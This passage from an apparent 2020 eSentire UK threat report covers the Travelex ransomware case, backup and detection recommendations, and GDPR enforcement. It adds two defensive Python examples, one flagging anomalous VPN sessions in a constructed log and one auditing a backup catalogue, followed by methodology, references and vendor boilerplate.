This incident confirms that ransomware attacks have transitioned from opportunistic nuisance to aggressive, well-planned and multi-faceted extortion. Further, it demonstrates the destructive capability of systemic ransomware designed to cripple large organisations and not just extract small sums of cryptocurrency from individuals and small businesses.
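The intrusion pattern described above (months of access on stolen or purchased VPN credentials, followed by quiet bulk exfiltration before the ransomware is triggered) leaves traces in logs that most organisations already collect. As an added example that is not part of the report and not eSentire's own tooling, the following Python script runs three simple checks over a constructed VPN session log: a login from a source country never seen in the account's baseline, a session ending in the small hours, and outbound volume an order of magnitude above the account's median. The log format, the field names, the `XX` country code and the thresholds are all assumptions made for this example.

```python
"""Surface signs of a long-dwell VPN intrusion in session records (constructed sample)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Constructed VPN session records (not taken from the report). One record per
# session: ISO-8601 end time, account, source country and bytes sent out of
# the network during the session. The field layout is an assumption.
SAMPLE_VPN_LOG = """\
2019-11-04T18:02:00Z user=alice src_country=GB bytes_out=14000000
2019-11-05T17:55:00Z user=alice src_country=GB bytes_out=9500000
2019-11-06T18:10:00Z user=alice src_country=GB bytes_out=11200000
2019-11-07T18:01:00Z user=alice src_country=GB bytes_out=13000000
2019-11-08T17:40:00Z user=alice src_country=GB bytes_out=10100000
2019-11-04T18:30:00Z user=bob src_country=GB bytes_out=4000000
2019-11-05T18:25:00Z user=bob src_country=GB bytes_out=5100000
2019-11-06T18:40:00Z user=bob src_country=GB bytes_out=4400000
2019-11-07T18:20:00Z user=bob src_country=GB bytes_out=4900000
2019-11-08T18:35:00Z user=bob src_country=GB bytes_out=4700000
2019-12-02T03:14:00Z user=alice src_country=XX bytes_out=4800000000
2019-12-03T18:05:00Z user=bob src_country=GB bytes_out=5000000
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src_country=(?P<cc>\S+) bytes_out=(?P<bytes>\d+)$"
)


def parse_log(text):
    """Parse the constructed record format into dicts, oldest session first."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable record: {line!r}")
        records.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "user": m["user"],
            "country": m["cc"],
            "bytes_out": int(m["bytes"]),
        })
    return sorted(records, key=lambda r: r["ts"])


def detect_anomalies(records, baseline_sessions=5, egress_factor=10,
                     min_egress_bytes=1_000_000_000, quiet_hours_end=6):
    """Learn a per-account baseline from its first `baseline_sessions` sessions,
    then flag later sessions that deviate. Returns (user, time, kind, detail)."""
    by_user = defaultdict(list)
    for r in records:
        by_user[r["user"]].append(r)

    findings = []
    for user, sessions in by_user.items():
        baseline = sessions[:baseline_sessions]
        if len(baseline) < baseline_sessions:
            continue  # not enough history to judge this account yet
        known_countries = {s["country"] for s in baseline}
        median_out = statistics.median(s["bytes_out"] for s in baseline)

        for s in sessions[baseline_sessions:]:
            when = s["ts"].isoformat()
            # Credentials used from a geography the account has never used.
            if s["country"] not in known_countries:
                findings.append((user, when, "new_source_country", s["country"]))
            # Outbound volume far above the account's own norm: possible staging/exfil.
            if s["bytes_out"] >= min_egress_bytes and s["bytes_out"] >= egress_factor * median_out:
                findings.append((user, when, "egress_spike", s["bytes_out"]))
            # Activity while the legitimate user is unlikely to be working.
            if s["ts"].hour < quiet_hours_end:
                findings.append((user, when, "off_hours_login", s["ts"].hour))
    return findings


if __name__ == "__main__":
    for finding in detect_anomalies(parse_log(SAMPLE_VPN_LOG)):
        print(finding)
```

In production the baseline would be learned from weeks of history rather than five sessions and the egress threshold tuned per role, but the shape is the point: an attacker who holds access for six months has to authenticate and move data, and each of those actions is a log line a detection rule can score.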

Defence Recommendations

As a general defence against ransomware, we recommend that organisations maintain frequent secondary and redundant backups of all essential systems and files either offline or in a segregated environment, extending back for a long period (as ransomware can lie dormant for many months).

Additionally, because executing an attack of this magnitude and with this amount of manual effort requires an exceptionally long dwell time, Managed Detection and Response (MDR) services offer an advantage in containing the threats prior to the activation of encryption.
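To make the backup recommendation checkable, here is an added example (not from the report and not eSentire's code) that audits a backup catalogue against the three questions the paragraph raises: is the newest offline copy recent enough, does offline history reach back past the period an attacker might lie dormant, and are there gaps in the offline series that a failed job would leave? The catalogue is constructed, the 180-day dormancy window is an assumption taken from the six-month access in the Travelex case, and the seven-day age and gap thresholds are placeholders to be replaced with the organisation's own policy.

```python
"""Audit a backup catalogue for ransomware resilience (constructed example)."""
from datetime import datetime, timedelta, timezone


def make_catalogue(now, online_days, offline_weeks, missing_weeks=()):
    """Build a constructed catalogue of (timestamp, tier) entries: one online
    copy per day for `online_days` days and one offline copy per week for
    `offline_weeks` weeks, skipping the weekly offsets in `missing_weeks` to
    simulate failed or skipped jobs. 'online' means reachable from production
    and therefore encryptable; 'offline' means air-gapped or segregated."""
    catalogue = [(now - timedelta(days=d), "online") for d in range(online_days)]
    catalogue += [(now - timedelta(weeks=w), "offline")
                  for w in range(offline_weeks) if w not in missing_weeks]
    return catalogue


def audit_backups(catalogue, now, dormancy_days=180,
                  max_offline_age_days=7, max_offline_gap_days=7):
    """Return a list of policy violations; an empty list means the offline
    series satisfies all three checks. Online copies are ignored on purpose:
    anything reachable from the network is assumed lost once the encryption
    stage runs."""
    offline = sorted(ts for ts, tier in catalogue if tier == "offline")
    problems = []
    if not offline:
        return ["no_offline_copies"]

    # 1. Recovery point: the newest offline copy must not be stale.
    if (now - offline[-1]).days > max_offline_age_days:
        problems.append("latest_offline_copy_stale")

    # 2. Depth: history must predate the dormancy window so a clean restore
    #    point exists even if the attacker was present for months.
    if (now - offline[0]).days < dormancy_days:
        problems.append("offline_history_shorter_than_dormancy_window")

    # 3. Continuity: no hole in the weekly series larger than policy allows.
    worst_gap = max(((b - a).days for a, b in zip(offline, offline[1:])), default=0)
    if worst_gap > max_offline_gap_days:
        problems.append("offline_gap_exceeds_policy")

    return problems


# Constructed reference date and a deliberately weak catalogue: 20 weeks of
# offline copies (short of 180 days) with week 4 missing.
NOW = datetime(2020, 6, 1, tzinfo=timezone.utc)
WEAK_CATALOGUE = make_catalogue(NOW, online_days=14, offline_weeks=20, missing_weeks={4})

if __name__ == "__main__":
    for problem in audit_backups(WEAK_CATALOGUE, NOW):
        print(problem)
```

Run against a real catalogue the same checks would consume the backup system's own inventory export; the value of keeping them as code is that the dormancy window and gap tolerance become reviewable numbers rather than an assumption buried in a runbook.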


Conclusions and General Recommendations

U.K. businesses and organisations are threatened by motivated actors armed with an arsenal of tools and tactics. From remote exploits and commodity malware to phishing, business email compromise and increasingly sophisticated and highly manual attacks, the cyber risks have never been greater.

While the recommendations presented so far are oriented towards the IT department, senior executives must play an important role in securing a business. To help, in 2019 the National Cyber Security Centre (NCSC) released its Board Toolkit, which outlines key obligations and priorities for board members and senior executives in the U.K.

We strongly recommend that executives leverage this toolkit so that they can familiarise themselves with the information required to make informed decisions about the risks their businesses face. Once armed with this information, executives are encouraged to evaluate and prioritise the risk management programs they need to put in place, including implementing effective cybersecurity measures and collaborating with suppliers and partners to mitigate security threats.

The most secure organisations prioritise cybersecurity as an investment in business continuity and brand reputation, rather than a burdensome expense or simply an IT matter.

A few years ago, the announcement and introduction of the European Union’s General Data Protection Regulation (GDPR) forced companies to take a serious look at how they protect personal data. According to The Department for Digital, Culture, Media & Sport’s Cyber Security Breaches Survey 2020, in doing so the GDPR “played a major role in getting organisations to review and update cyber security policies and processes.”22

Plus, several high-profile incidents—particularly those experienced by Marriott and British Airways—have shown that there are significant financial consequences for organisations that fail to protect customer data, with the Information Commissioner’s Office (ICO) ruling that each had breached data protection laws and announcing in July 2019 that it had the intention to fine the two companies £99 million and £183.4 million, respectively.23,24

Unfortunately, there are signs that the attention brought to cybersecurity by GDPR has waned, with the Department for Digital, Culture, Media & Sport’s Cyber Security Breaches Survey 2020 also concluding that since the initial round of updates, “many of these improvements have been maintained but not enhanced.”

On a similar note, a recent report on Data Protection Authorities’ (DPAs) capacity to enforce against GDPR infringements raises concerns about the efficacy of the legislation.25 If companies conclude that DPA enforcement is lacking and the risk of regulatory penalties is low, then their cybersecurity investments could fall below the levels needed to keep pace with motivated threat actors.

Nevertheless, the ICO remains busy during the global pandemic. In mid-May 2020, news emerged that EasyJet had experienced a “highly-sophisticated cyberattack” affecting approximately nine million customers and that the airline had informed the ICO about the incident, which was detected in January. In relation to the incident, the ICO stated that “People have a right to expect that organisations will handle their personal information securely and responsibly. When that doesn't happen, we will investigate and take robust action where necessary.”26


While the degree of risk is difficult to ascertain precisely, it’s reasonable to conclude that it’s only a matter of time before an organisation suffers a cybersecurity incident. This realistic mindset highlights the importance of minimising threat actor dwell time. Recall the Travelex example and consider that most criminals need only 15-25 hours to breach perimeter defences, identify valuable data and extract it.27

Faced with such sophisticated attackers and techniques, detecting a threat and being able to respond effectively requires coverage of the entire threat surface.

Finally, while no defence is impenetrable—in fact, because no defence is impenetrable—it is vital that organisations invest in a response capability, whether internally or through a third party.

For more cybersecurity information, resources and guidance, please see our Resource Library.28


Methodology

eSentire Threat Intelligence used data gathered from April 2019 to May 2020 from approximately 500 proprietary network and host-based detection sensors distributed within the United Kingdom across multiple industries. Raw data was normalised and aggregated using automated machine-based processing methods. Processed data was reviewed by a visual data analyst applying quantitative analysis methods. Quantitative intelligence analysis results were further processed by a qualitative intelligence analyst, resulting in a written analytical product.


References

[1] See (ISC)² Estimates Cybersecurity Workforce at 2.8 Million

[2] The survey is available at: https://pages.egress.com/GDPR-survey-2019-uslp.html

[3] The survey is available at: https://www.gov.uk/government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020

[4] VMware Carbon Black’s reports are housed at: https://www.carbonblack.com/resources/threat-research/global-threat-report-series/

[5] The report is available at: https://securityintelligence.com/posts/whats-new-in-the-2019-cost-of-a-data-breach-report/

[6] See Spread of Coronavirus-Themed Cyberattacks Persists with New Attacks

[7] See this MalwareHunterTeam Twitter post

[8] See Coronavirus-related scams rack up $12 million

[9] The release is available at: https://www.cisa.gov/news/2020/04/08/uk-and-us-security-agencies-issue-covid-19-cyber-threat-update

[10] An ISACA survey on the impact of COVID reports that 87 percent of respondents say the rapid requirement to work from home increased the risk of data privacy and protection issues

[11] https://www.esentire.com/covid19-cybersecurity-resources

[12] See Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities

[13] This increase may be associated with CVE-2019-19781, but we have not investigated further

[14] The eSentire 2019 Annual Global Threat Intelligence Report explains in some depth how Emotet, Ursnif and Dridex rapidly evolve tactics to maximise campaign effectiveness

[15] https://www.esentire.com/blog/new-bolo-phishing-attacks-that-customize-o365-pages-with-your-branding

[16] For a thorough explanation of how these attacks were executed, see Microsoft Office 365 heist highlights sophistication of cultural engineering cyber attacks

[17] In early January, CSO Online posted U.K.’s Travelex hit by ‘big game’ REvil ransomware attackers

[18] Per Travelex being held to ransom by hackers

[19] Per Travelex being held to ransom by hackers

[20] In early January, CSO Online posted U.K.’s Travelex hit by ‘big game’ REvil ransomware attackers

[21] As reported in Travelex Paid Hackers Multimillion-Dollar Ransom Before Hitting New Obstacles

[22] The survey is available at: https://www.gov.uk/government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020

[23] See Statement: Intention to fine Marriott International, Inc more than £99 million under GDPR for data breach

[24] See Intention to fine British Airways £183.39m under GDPR for data breach

[25] See Europe’s governments are failing the GDPR

[26] See EasyJet admits data of nine million hacked

[27] Some surveys and studies suggest even faster timeframes; for instance, The Black Report 2018, published by Nuix, includes a broad distribution of figures ranging as low as one hour. The report states that, “Across all industries, most of the professional hackers surveyed said they could bypass security systems, locate critical data, and exfiltrate that data within 15 hours.”

[28] https://www.esentire.com/resources/library


eSentire, Inc., the global leader in Managed Detection and Response (MDR), keeps organisations safe from constantly evolving cyberattacks that technology alone cannot prevent. Its 24x7 Security Operations Centres (SOCs), staffed by elite security analysts, hunt, investigate and respond in real time to known and unknown threats before they become business-disrupting events. Protecting more than $6 trillion AUM, eSentire absorbs the complexity of cybersecurity, delivering enterprise-grade protection and the ability to comply with growing regulatory requirements. For more information, visit www.esentire.com and follow @eSentire.